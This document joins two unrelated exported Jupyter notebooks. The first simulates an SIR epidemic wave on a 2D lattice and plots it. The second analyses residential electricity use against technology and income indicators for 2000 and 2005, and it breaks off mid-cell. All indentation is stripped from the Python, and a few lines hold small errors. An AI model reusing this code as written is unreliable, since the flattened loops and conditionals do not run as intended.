beta_1.0e-01/n1_10_n2_2/infected
beta_1.0e-01/n1_10_n2_2/susceptible
beta_1.0e-01/n1_10_n2_2/times
beta_1.0e-01/n1_10_n2_4
beta_1.0e-01/n1_10_n2_4/infected
beta_1.0e-01/n1_10_n2_4/susceptible
beta_1.0e-01/n1_10_n2_4/times
beta_1.0e-01/n1_10_n2_6
beta_1.0e-01/n1_10_n2_6/infected
beta_1.0e-01/n1_10_n2_6/susceptible
beta_1.0e-01/n1_10_n2_6/times
beta_1.0e-01/n1_10_n2_8
beta_1.0e-01/n1_10_n2_8/infected
beta_1.0e-01/n1_10_n2_8/susceptible
beta_1.0e-01/n1_10_n2_8/times
n1_10_n2_0
n1_10_n2_0/beta_1.0e-01
n1_10_n2_0/beta_1.0e-01/infected
n1_10_n2_0/beta_1.0e-01/susceptible
n1_10_n2_0/beta_1.0e-01/times
n1_10_n2_0/beta_2.0e-01
n1_10_n2_0/beta_2.0e-01/infected
n1_10_n2_0/beta_2.0e-01/susceptible
n1_10_n2_0/beta_2.0e-01/times
n1_10_n2_0/beta_4.0e-01
n1_10_n2_0/beta_4.0e-01/infected
n1_10_n2_0/beta_4.0e-01/susceptible
n1_10_n2_0/beta_4.0e-01/times
n1_10_n2_0/beta_5.0e-02
n1_10_n2_0/beta_5.0e-02/infected
n1_10_n2_0/beta_5.0e-02/susceptible
n1_10_n2_0/beta_5.0e-02/times
###Markdown
Parameters
###Code
n1 = 10 # 2^n1 is the length
n2 = 0 # 2^n2 is the height
Delta_x = 1
alpha = 1.0e-1 # intra-community infectivity coefficient
beta = alpha # extra-community infectivity coefficient
gamma = 0.1 # inverse recovery time
tmax = 3000. # maximum time
tdump = 1.0e0 # time interval between dumps
params = { \
'delta_x': Delta_x, \
'alpha': alpha, \
'beta': beta, \
'gamma': gamma, \
'n1': n1, \
'n2': n2, \
'tmax': tmax, \
'tdump': tdump
}
params_template = {key: params[key] for key in params.keys()}
pref = "beta_{:.1e}".format(beta)
cp.cuda.Device(0).use()
exts = ['.png', '.svg']
n2_list = [0, 1, 2, 4, 6, 8]
n_list = len(n2_list)
for n2 in n2_list:
print("".join(['-']*10))
print("n2 = {:.1e}".format(n2))
params = {key:params_template[key] for key in params_template.keys()}
params['n2'] = n2
# initial condition
eps = 1.0e-8 # total fraction of population
N = 2**(n1+n2) # total number of communities
S = cp.ones((2**n1, 2**n2), dtype=np.float_)
I = cp.zeros((2**n1, 2**n2), dtype=np.float_)
if n2 == 0:
V = cp.array([N*eps])
else:
V = cp.zeros(2**n2)
V[[2**(n2-1)-1,2**(n2-1)]] = 0.5*N*eps
S[0] -= V
I[0] += V
times, Ss, Is = lattice_2d_integrate_sir(S, I, alpha=alpha, beta=beta, gamma=gamma, tmax=tmax, tdump=tdump, method='DOP853')
print("integration complete")
# save
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'a') as f5py:
if not (path in f5py.keys()):
grp = f5py.create_group(path)
grp = f5py[path]
for key in params.keys():
grp.attrs[key] = params[key]
# print(grp.keys())
name = "times"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=times.shape, dtype=times.dtype, data=times, \
compression="gzip", compression_opts=complevel)
name = "susceptible"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=Ss.shape, dtype=Ss.dtype, data=Ss, \
compression="gzip", compression_opts=complevel)
name = "infected"
if name in grp.keys():
del grp[name]
dset = grp.create_dataset(name, shape=Is.shape, dtype=Is.dtype, data=Is, \
compression="gzip", compression_opts=complevel)
print("data written to {:s}>{:s}".format(str(resfile), path))
times_list = []
I_tot_list = []
T_tot_list = []
dT_tot_list = []
Sm_list = []
Im_list = []
Tm_list = []
dTm_list = []
for n2 in n2_list:
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'r') as f5py:
if not (path in f5py.keys()):
raise ValueError("{:s} not in the database".format(path))
grp = f5py[path]
# print(grp.keys())
name = "times"
times = grp[name][:]
name = "susceptible"
Ss = grp[name][:]
name = "infected"
Is = grp[name][:]
dt = np.diff(times)[0]
Ts = 1 - Ss
dTs = np.concatenate([Is[0].reshape(1,Is.shape[1], Is.shape[2]), np.diff(Ts, axis=0)], axis=0)
dTs /= dt
dT_tot = np.mean(dTs, axis=(1,2))
T_tot = np.mean(Ts, axis=(1,2))
I_tot = np.mean(Is, axis=(1,2))
if n2 == 0:
midline = [0]
else:
midline = [2**(n2-1)-1,2**(n2-1)]
Sm = np.mean(Ss[:,:,midline], axis=2)
Im = np.mean(Is[:,:,midline], axis=2)
Tm = np.mean(Ts[:,:,midline], axis=2)
dTm = np.mean(dTs[:,:,midline], axis=2)
times_list.append(times)
I_tot_list.append(I_tot)
T_tot_list.append(T_tot)
dT_tot_list.append(dT_tot)
Sm_list.append(Sm)
Im_list.append(Im)
dTm_list.append(dTm)
Tm_list.append(Tm)
###Output
_____no_output_____
###Markdown
Figures
###Code
figdir = Path('..') / '..' / 'figures' / '6-simulations' / '64-lattice_2d_nneighbors_loop_n2'
if not figdir.is_dir():
figdir.mkdir(parents=True, exist_ok=True)
print(figdir)
###Output
../../figures/6-simulations/64-lattice_2d_nneighbors_loop_n2
###Markdown
Total number of new cases
###Code
# parameters
figsize = (6,4.5)
dpi = 300
ms=2
lw=1
show_dT=False
norm = mco.Normalize(vmin=0, vmax=n_list-1)
cmap = cm.rainbow
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
if show_dT:
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
dT_tot = dT_tot_list[n]
label = "n2 = {:d}".format(n2)
ax.plot(times,dT_tot, '-', ms=ms, color=cmap(norm(n)), label=label)
ax.set_ylabel("$d T$", fontsize="medium")
fname = 'domega_tot'
else:
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
T_tot = T_tot_list[n]
label = "n2 = {:d}".format(n2)
ax.plot(times,T_tot, '-', ms=ms, color=cmap(norm(n)), label=label)
ax.set_ylabel("$T$", fontsize="medium")
fname = 'omega_tot'
ax.legend(loc='best', fontsize='medium')
ax.set_xlim(times[0],None)
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Wave position
###Code
from functions import lattice_2d_ramp_fit as ramp_fit
from functions import lattice_2d_get_velocity_theoretical as get_velocity_theoretical
from functions import framp
# parameters
figsize = (6,4.5)
dpi = 300
ms=2
lw=1
pfit_list = []
# make figure
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
for n in range(n_list):
n2 = n2_list[n]
times = times_list[n]
dTm = dTm_list[n]
W = np.argmax(dTm, axis=1)
color = cmap(norm(n))
label = "n2 = {:d}".format(n2)
ax.plot(times, W, '-', color=color, lw=lw, ms=ms, label=label)
pfit = ramp_fit(W, times, wmax=0.2*np.max(W), maxfev=1000)
pfit_list.append(pfit)
plt.plot(times, framp(times, *pfit), 'k--', lw=lw)
v = get_velocity_theoretical(beta, gamma, alpha, S_ss=1.)
plt.plot(times, v*(times-pfit[1]), 'k-.', lw)
ax.set_xlim(times[0],None)
ax.set_ylim(0., None)
ax.set_xlabel("time", fontsize="medium")
ax.set_ylabel("column", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
fname = 'wave_position'
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
fname = 'wave_position'
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Fit to analytical prediction
###Code
from functions import wave_front_get_ode_sol, get_binned
from scipy.optimize import minimize_scalar, bracket
from functions import lattice_2d_get_velocity as get_velocity
from functions import lattice_2d_rescale_wave_profile as rescale_wave_profile
figsize=(8,4.5)
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
kfit_list = []
dx = params['delta_x']
X = np.arange(2**n1, dtype=np.float_)
for n in range(n_list):
# for n in range(2):
n2 = n2_list[n]
alpha = beta
times = times_list[n]
dTm = dTm_list[n]
W = np.argmax(dTm, axis=1)
color = cmap(norm(n))
label = "n2 = {:d}".format(n2)
v = get_velocity(W, times, wmax=0.2*np.max(W), maxfev=1000)
a = alpha/beta + 4.
C = a*beta**2/(4*v**2)
D = 2*gamma/(beta*a)
CMAX = 1./(16*(1-0.5*D))
print("v = {:.4f} C = {:.4f} D = {:.4f} CMAX = {:.4f}".format(v,C,D,CMAX))
# theoretical value for scale k
kfit = 2*v/beta
# compute profile (centered around its maximum)
Z_C, Y_C, S_C, R_C = wave_front_get_ode_sol(C, D, tmax=10000, npts=100000, eps=1.0e-3)
k0 = np.argmax(Y_C)
Z_C -= Z_C[k0]
# fit the wave profile at a given time
kt = int(0.9*len(times))
Z, Y = rescale_wave_profile(kfit, X, dTm[kt], Z_C, Y_C, v, dx)
# plots
ax.plot(Z_C, Y_C, '-', color=color, lw=lw)
ax.plot(Z, Y, 's', color=color, ms=2*ms, label="n2 = {:d}, C = {:.4f}".format(n2, C))
# ax.plot(Z, G/(v*kfit/2.), 's', color=color, ms=2*ms, label="beta = {:.1e}, C = {:.4f}".format(beta, C))
ax.set_xlim(-100,100)
# ax.set_ylim(0., 1)
ax.legend(loc='upper left', fontsize='medium', bbox_to_anchor=(1., 0.98), frameon=False)
ax.set_xlabel("date", fontsize="medium")
ax.set_ylabel("column", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout()
fname = 'profile_collapse_fit'
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*360)
###Output
_____no_output_____
###Markdown
Show wave profiles
###Code
time_sel = np.linspace(0., 200, 21).astype('int64')
for n in range(len(n2_list)):
n2 = n2_list[n]
print("n2 = ¨{:d}".format(n2))
times = times_list[n]
dTm = dTm_list[n]
norm = mco.Normalize(0, len(time_sel)-1)
cmap = cm.viridis
figsize=(12,3)
fig = plt.figure(facecolor='w', figsize=figsize)
ax = fig.gca()
X = np.arange(2**n1, dtype=np.float_)
for k in range(len(time_sel)):
t = time_sel[k]
color = cmap(norm(k))
Y = dTm[t]
idx = Y > 0.
ax.plot(X[idx], Y[idx], '-', color=color, lw=lw)
# ax.legend(loc='best')
ax.set_xlim(0,None)
ax.set_ylim(0., None)
ax.set_xlabel("x", fontsize="medium")
ax.set_ylabel("dT", fontsize="medium")
plt.xticks(rotation=45)
ax.spines['right'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.tick_params(left=True, labelleft=True, bottom=True, labelbottom=True)
ax.tick_params(axis='both', length=4)
fig.tight_layout(rect=[0., 0., 0.98, 1.])
cax = fig.add_axes(rect=[0.98,0.2,0.01,0.7])
cbar = plt.colorbar(cm.ScalarMappable(norm=norm, cmap=cmap),
cax=cax, extendfrac='auto')
cbar.set_label("time")
fname = 'wave_profiles_n2_{:d}'.format(n2)
for ext in exts:
filepath = figdir / (fname + ext)
fig.savefig(filepath, bbox_inches='tight', pad_inches=0, dpi=dpi)
print("Written file: {:s}".format(str(filepath)))
fig.clf()
plt.close('all')
n2 = 0
fname = 'wave_profiles_n2_{:d}'.format(n2)
filepath = figdir / (fname + '.png')
Image(filename=filepath, width=4./3*480)
###Output
_____no_output_____
###Markdown
Wave animation
###Code
fps = 30
dpi=300
outputdir = figdir / '2d_plots'
idump = max(int(tmax/tdump/1000),1)
for n in range(len(n2_list)):
n2 = n2_list[n]
print("n2 = ¨{:d}".format(n2))
path = str(Path(pref) / "n1_{:d}_n2_{:d}".format(n1,n2))
with h5py.File(resfile,'r') as f5py:
if not (path in f5py.keys()):
raise ValueError("{:s} not in the database".format(path))
grp = f5py[path]
# print(grp.keys())
name = "times"
times = grp[name][::idump]
name = "susceptible"
Ss = grp[name][::idump]
name = "infected"
Is = grp[name][::idump]
dt = np.diff(times)[0]
Ts = 1 - Ss
dTs = np.concatenate([Is[0].reshape(1,Is.shape[1], Is.shape[2]), np.diff(Ts, axis=0)], axis=0)
dTs /= dt
tpdir = outputdir / 'n2_{:d}'.format(n2)
if not tpdir.is_dir():
tpdir.mkdir(parents=True, exist_ok=True)
for ext in exts:
for f in tpdir.glob('*' + ext): f.unlink()
fileout = outputdir / 'n2_{:d}.mp4'.format(n2)
tfmt = "t{:0" + "{:.0f}".format(np.ceil(np.log10(times[-1]))) + ".{:.0f}".format(max(0,-int(np.floor(np.log10(np.diff(times)[0]))))) +"f}"
nt = len(times)
vmax = 10**np.ceil(np.log10(np.max(dTs)))
filenames = []
for kt in range(nt):
t = times[kt]
fig = plt.figure(dpi=dpi)
ax = fig.gca()
title = "t = {:.1f}".format(t)
ax.set_title(title, fontsize="large")
im = ax.imshow(dTs[kt].T, cmap=cm.magma_r, origin='lower', vmin=0., vmax=vmax)
ax.tick_params(axis='both', length=4)
plt.colorbar(im, label='dT')
fname = str(tpdir / tfmt.format(t))
for ext in ['.png']:
fpath = fname + ext
fig.savefig(fpath, dpi=dpi, bbox_inches='tight', pad_inches=0)
fpath = fname + ".png"
filenames.append(fpath)
fig.clf()
plt.close('all')
# write movie
imageio.mimsave(fileout, [imageio.imread(f) for f in filenames], fps=fps)
print(f"Written file {fileout}.")
# shutil.rmtree(tpdir)
k=5
fpath = outputdir / 'n2_{:d}.mp4'.format(n2_list[k])
HTML("""
<video height="360" controls>
<source src="{:s}" type="video/mp4">
</video>
""".format(str(fpath)))
###Output
_____no_output_____ |
Electricity consumption in different regions of the world.ipynb | ###Markdown
Project: Energy consumption in the world based on level of technology and income in selected countries Table of ContentsIntroductionData WranglingExploratory Data AnalysisConclusions Introduction> I have selected few tables from Gapminder project and one additional table with categorization of countries to its continents from Data Hub. From Gapminder I have chosen dataset **Residentual electricity use per person in kilowatt/hours as dependent variable of various technology indicators** (personal computers per 100 people, cell phones per 100 people, internet users as % of population, urban population as % of population and income per person as one not tech related indicator. After viewing different years in each table, I have decided to **select two recent years 2000 and 2005**.> My main question was: **How does countries with high electricity consumption differ from countries with low electricity consumption?** I will try to find the answers in two sections: 1. **Difference in regional representation**2. **Difference in tech and income level** >Therefore, my main question can be divided in few more minor questions:1. How are different regions (continents) represented in groups of high or low electricity consumption contries? - In which regions and countries we can see highest increase in electricity consumption between 2000 and 2005? - Can we see *mobility* of regions between low and high electricity groups between 2000 and 2005? 2. How do high electricity consumption countries differ in ownership of personal computers, phones, proportion of internet users in population, urbanization and level of income? - Which variable from tech indicators and income has the strongest correlation with electricity consumption? - Can we observe low electricity consumption countries cathing up to high electricity countries in terms of tech indicators or income over time, in our case from 2000 to 2005?
###Code
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
###Output
_____no_output_____
###Markdown
Data Wrangling> All tables needed are loaded below:
###Code
comp = pd.read_csv('computers_per_100_people.csv')
phone = pd.read_csv('cell_phones_per_100_people.csv')
regions = pd.read_csv('country-and-continent-codes.csv')
internet = pd.read_csv('internet_users.csv')
urban = pd.read_csv('urban_population_percent_of_total.csv')
income = pd.read_csv('income_per_person_gdppercapita.csv')
electricity = pd.read_csv('residential_electricity_use_per_person.csv')
###Output
_____no_output_____
###Markdown
I checked all files in Excel and used vlookup to make sure names of countries used in Gapminders datasets and names of countries in regions table from Data Hub match. I made just few changes in names *(for example when one source used **Macedonia** and other **Macedonia, FYR** as country name, I corrected it just to one version: Macedonia, FYR)* > Below, I checked for missing values and different date ranges of each variables. Based on this I have chosen to focus only on years 2000 and 2005 as these years were present in all datasets with not so many missing values.
###Code
comp.head(4)
comp.isnull().sum()
phone.head(4)
phone.isnull().sum()
regions.head(4)
regions.isnull().sum()
internet.head(4)
internet.isnull().sum()
urban.head(4)
urban.isnull().sum()
income.head(4)
income.isnull().sum().any()
electricity.head(4)
electricity.isnull().sum()
###Output
_____no_output_____
###Markdown
Data Cleaning I wanted to merge all tables to one table where column **country** would be merging anchor for all data. Also all countries without electricity consumption data would be removed from analysis.> From Regions table all unnecessary columns were dropped:
###Code
regions.head()
regions.drop((regions.iloc[:, 2:5]), axis=1, inplace=True)
regions.head()
###Output
_____no_output_____
###Markdown
From Gapminder tables I needed to **remove all columns except for country and years 2000 and 2005**. From computer, phone and internet table where more values were missing, I decided to fill them with 2001 values and 2004 values. > Unnecessary columns were dropped:
###Code
comp.drop(comp.columns.difference(['country', '2000', '2001', '2004', '2005', ]), 1, inplace=True)
phone.drop(phone.columns.difference(['country', '2000', '2001', '2004', '2005', ]), 1, inplace=True)
internet.drop(internet.columns.difference(['country', '2000', '2001', '2004', '2005', ]), 1, inplace=True)
urban.drop(urban.columns.difference(['country', '2000','2005']), 1, inplace=True)
income.drop(income.columns.difference(['country', '2000','2005']), 1, inplace=True)
electricity.drop(electricity.columns.difference(['country', '2000','2005']), 1, inplace=True)
###Output
_____no_output_____
###Markdown
> Missing values from computer, phone and internet table in year 2000 were replaced by 2001 values and missing values for 2005 were replaced by 2004 values. After that, original 2001 and 2004 columns were removed:
###Code
comp['2000'].fillna(comp['2001'], inplace=True)
comp['2005'].fillna(comp['2004'], inplace=True)
phone['2000'].fillna(phone['2001'], inplace=True)
phone['2005'].fillna(phone['2004'], inplace=True)
internet['2000'].fillna(internet['2001'], inplace=True)
internet['2005'].fillna(internet['2004'], inplace=True)
comp.drop(['2001', '2004'], axis=1, inplace=True)
phone.drop(['2001', '2004'], axis=1, inplace=True)
internet.drop(['2001', '2004'], axis=1, inplace=True)
###Output
_____no_output_____
###Markdown
> Firstly, I merged *electricity* table with *regions* table in one:
###Code
merged1 = electricity.merge(regions, left_on='country', right_on='Country', how='left')
merged1
###Output
_____no_output_____
###Markdown
> Second *Country* column was removed and *Continent_Name* column changed to shorter name. Also *2000* and *2005* were given specific sufix for easier identification in future larger dataset with all variables.
###Code
merged1.pop('Country')
merged1.rename(columns={'2000':'2000_el','2005':'2005_el','Continent_Name':'region'}, inplace=True)
merged1
###Output
_____no_output_____
###Markdown
Also in remaining tables I had to add suffixes to columns *2000* and *2005* to identify original source of data. For that I created function *new_name*. (Returning result of the function is just optional, for checking that everything is OK.)
###Code
comp.name = 'comp'
phone.name = 'phone'
internet.name = 'int'
urban.name = 'urban'
income.name = 'income'
tables = [comp, phone, internet, urban, income]
def new_name_col (tables):
for table in tables:
table.rename(columns={'2000':'2000_'+table.name, '2005':'2005_'+table.name}, inplace=True)
return tables[len(tables)-1].head()
new_name_col(tables)
###Output
_____no_output_____
###Markdown
Function *merged_table* was created for merging all remaining tables, while keeping only countries which have electricity consumption values.
###Code
def merged_table (first_table, tables):
merged = first_table
for table in tables:
merged = merged.merge(table, on='country', how='left')
return merged
merged_table (merged1, tables)
merged = merged_table (merged1, tables)
###Output
_____no_output_____
###Markdown
>Last check for missing values:
###Code
merged.info(), merged.isnull().sum()
###Output
<class 'pandas.core.frame.DataFrame'>
Int64Index: 130 entries, 0 to 129
Data columns (total 14 columns):
country 130 non-null object
2000_el 129 non-null float64
2005_el 129 non-null float64
region 130 non-null object
2000_comp 124 non-null float64
2005_comp 121 non-null float64
2000_phone 127 non-null float64
2005_phone 130 non-null float64
2000_int 129 non-null float64
2005_int 127 non-null float64
2000_urban 130 non-null float64
2005_urban 130 non-null float64
2000_income 130 non-null int64
2005_income 130 non-null int64
dtypes: float64(10), int64(2), object(2)
memory usage: 15.2+ KB
###Markdown
>Identifying missing values:
###Code
merged[merged['2000_comp'].isnull()]
merged[merged['2005_comp'].isnull()]
merged[merged['2005_el'].isnull()]
merged[merged['2000_int'].isnull()]
merged[merged['2005_int'].isnull()]
###Output
_____no_output_____
###Markdown
I decided to drop all countries with missing values. I considered 14 countries from 130 in total as acceptable. Moreover countries with missing values were not only from one region.
###Code
merged.dropna(inplace=True)
merged.info()
###Output
<class 'pandas.core.frame.DataFrame'>
Int64Index: 116 entries, 0 to 129
Data columns (total 14 columns):
country 116 non-null object
2000_el 116 non-null float64
2005_el 116 non-null float64
region 116 non-null object
2000_comp 116 non-null float64
2005_comp 116 non-null float64
2000_phone 116 non-null float64
2005_phone 116 non-null float64
2000_int 116 non-null float64
2005_int 116 non-null float64
2000_urban 116 non-null float64
2005_urban 116 non-null float64
2000_income 116 non-null int64
2005_income 116 non-null int64
dtypes: float64(10), int64(2), object(2)
memory usage: 13.6+ KB
###Markdown
>After viewing representation of each continent in total, I decided to also remove one Oceania case because it would be disproportional to other continents.
###Code
merged.groupby('region').describe()
merged.drop(merged.index[merged['region'] == 'Oceania'], axis=0, inplace = True)
merged.groupby('region').describe()
###Output
_____no_output_____
###Markdown
Exploratory Data Analysis For start, I wanted to know how evenly is electricity consumption distributed among the countries. From histograms below we can tell that the distribution of electricity consumption is very sharply right skewed in both years. This means there is small group of countries with very high electricity consumption and quite big group with very low electricity consumption.
###Code
electricity['2000'].hist(figsize=(7, 5))
plt.title('Distribution on electricity consumption in 2000')
plt.xlabel('electricity consumption')
plt.ylabel('frequency of countries');
electricity['2005'].hist(figsize=(7, 5))
plt.title('Distribution on electricity consumption in 2005')
plt.xlabel('electricity consumption')
plt.ylabel('frequency of countries');
###Output
_____no_output_____
###Markdown
Question: How does countries with high electricity consumption differ from countries with low electricity consumption? >Firstly, I need to define countries with high and low electricity consumption. I will use median value to split them in these two groups:
###Code
high_energy_2000 = merged[merged['2000_el'] >= (merged1['2000_el'].median())]
low_energy_2000 = merged[merged['2000_el'] < (merged1['2000_el'].median())]
high_energy_2005 = merged[merged['2005_el'] >= (merged1['2005_el'].median())]
low_energy_2005 = merged[merged['2005_el'] < (merged1['2005_el'].median())]
###Output
_____no_output_____
###Markdown
>Secondly, because in merged table I have 2000 and 2005 years and I don't want them to be always mixed up, I will further separate data based on years as well:
###Code
cols = merged.columns
c2000 = (cols[cols.str.contains('2000')])
c2005 = (cols[cols.str.contains('2005')])
c2000
###Output
_____no_output_____
###Markdown
1. Difference in regions How are different regions (continents) represented in groups of high or low electricity consumption contries? > Firstly, let's see how are high and low energy countries represented in different continents.
###Code
high_energy_2005.groupby('region')['2005_el'].count(), low_energy_2005.groupby('region')['2005_el'].count()
###Output
_____no_output_____
###Markdown
> We can also view percentages of high or low electricity consumption cases within each region.
###Code
round((high_energy_2005.groupby('region')['2005_el'].count()) / (merged.groupby('region')['2005_el'].count())*100, 2)
round((low_energy_2005.groupby('region')['2005_el'].count()) / (merged.groupby('region')['2005_el'].count())*100, 2)
###Output
_____no_output_____
###Markdown
>Or percentages of regional share within high or low electricity consumption groups
###Code
pct_high = round(((high_energy_2005.groupby('region')['2005_el'].count()) / (high_energy_2005.groupby('region')['2005_el'].count().sum())*100), 1)
pct_high
labels = list(pct_high.index)
sizes = list(pct_high.values)
plt.figure(figsize=(9,6))
plt.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90, pctdistance=0.8)
plt.axis('equal') # equal aspect ratio ensures that pie is drawn as a circle.
plt.title("Share of countries with high electricity consumption in regions");
plt.show()
pct_low = round(((low_energy_2005.groupby('region')['2005_el'].count()) / (low_energy_2005.groupby('region')['2005_el'].count().sum())*100), 1)
pct_low
labels = list(pct_low.index)
sizes = list(pct_low.values)
plt.figure(figsize=(9,6))
plt.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90)
plt.axis('equal') # equal aspect ratio ensures that pie is drawn as a circle.
plt.title("Share of countries with low electricity consumption in regions")
plt.show()
###Output
_____no_output_____
###Markdown
Can we see *mobility* of regions between low and high electricity groups between 2000 and 2005? >Now, let's investigate changes in regional distribution from 2000 to 2005.
###Code
(high_energy_2005.groupby('region')['2005_el'].count()) - (high_energy_2000.groupby('region')['2000_el'].count())
###Output
_____no_output_____
###Markdown
In which regions and countries we can see highest increase in electricity consumption between 2000 and 2005?
###Code
electricity_change = (merged['2005_el']*100)/(merged['2000_el'])
merged.insert(4, 'el_change', electricity_change)
merged.groupby('region')['el_change'].mean().sort_values(ascending=False)
###Output
_____no_output_____
###Markdown
> Which countries experienced the highest increase in electricity consumption?
###Code
el_country_max = merged.sort_values(by=['el_change'], ascending=False)
el_country_max.iloc[0:20, 0:5]
###Output
_____no_output_____
###Markdown
> Where can we find the TOP 20 countries with the highest increase in electricity consumption?
###Code
top20_el_change = el_country_max.iloc[0:20, 0:5]
region_top_change = top20_el_change.groupby('region')['region'].count()
plt.bar([1, 2, 3, 4], region_top_change.values, tick_label=region_top_change.index)
plt.title('Highest energy consumption increase from 2000 to 2005 in countries grouped by region')
plt.xlabel('continents')
plt.ylabel('number of countries');
###Output
_____no_output_____
###Markdown
*Summary of difference in region*: Even though electricity consumption is picking up the fastest in African countries, most of African countries belong to low electricity consumption group. Whereas high electricity consumption group consists from 84 % from European and Asian countries. 91 % of European countries, 55 % of Asian countries and only 3,5 % of African countries belong to high electricity group. Between 2000 and 2005 we witnessed 3 Asian countries move from low electricity group to high electricity group. 2. Difference in technology and income How do high electricity consumption countries differ in ownership of personal computers, phones, proportion of internet users in population, urbanization and level of income? > I wanted to see how high and low electricity consumption countries differ in technology indicators and income:
###Code
high_energy_2005[c2005].mean()
low_energy_2005[c2005].mean()
(high_energy_2005[c2005].mean())/(low_energy_2005[c2005].mean())
###Output
_____no_output_____
###Markdown
>We can see that on average high electrcity countries had in 2005 8,6x higher consumption of electricity, used 7,7x higher number of personal computers per 100 persons, almost 3x higher number of phones per 100 people, had 5,8x higher number of internet users in population and 1,5 higher number of people in population living in urbanised areas while enjoying 5,4 higher income than countries with low electricity consumption.
###Code
### Can we observe low electricity consumption countries cathing up to high electricity countries in terms of tech indicators or income over time, in our case from 2000 to 2005?
###Output
_____no_output_____
###Markdown
>From numbers below we can that this divide between high and low electricity countries was greater in 2000 when looking on phone or computer ownerships and percentage of internet users in population, but stayed quite similar when looking on urbanization of countries or their income.
###Code
(high_energy_2000[c2000].mean())/(low_energy_2000[c2000].mean())
###Output
_____no_output_____
###Markdown
> Mean values may be distorted by extremes. Therefore I would like to see the gap between high and low electricity countries in tech and income indicators also in graphs.
###Code
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_phone'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_phone'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 130)
plt.legend()
plt.title('Gap in ownership of phones in high and low energy consumption countries')
plt.xlabel('number of phones per 100 people in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_phone'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_phone'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 130)
plt.legend()
plt.xlabel('number of phones per 100 people in 2005');
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_comp'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_comp'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.legend()
plt.title('Gap in ownership of personal computers in high and low energy consumption countries')
plt.xlabel('number of PCs per 100 people in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_comp'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_comp'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.legend()
plt.xlabel('number of PCs per 100 people in 2005');
###Output
_____no_output_____
###Markdown
> From 2 graphs above we can observe that gap in ownership of phones and computers between high and low electricity countries is closing much quicker in case of phones.
###Code
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_int'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_int'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 90)
plt.legend()
plt.title('Gap in percentage of internet users in population between high and low energy consumption countries')
plt.xlabel('% of internet users in population in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_int'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_int'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 90)
plt.xlabel('% of internet users in population in 2005')
plt.legend();
plt.figure(figsize=(10, 6))
ax1 = plt.subplot(1, 2, 1)
high_energy_2000['2000_urban'].hist(alpha = 0.5, label='high_energy')
low_energy_2000['2000_urban'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.legend()
plt.title('Gap in urbanization between high and low energy consumption countries')
plt.xlabel('% of urban population in total population in 2000')
plt.ylabel('number of countries');
ax2 = plt.subplot(1, 2, 2, sharey=ax1)
high_energy_2005['2005_urban'].hist(alpha = 0.5, label='high_energy')
low_energy_2005['2005_urban'].hist(alpha = 0.5, label='low_energy')
plt.xlim(0, 100)
plt.xlabel('% of urban population in total population in 2005')
plt.legend();
plt.figure(figsize=(12, 8))
ax1 = plt.subplot(1, 2, 1)
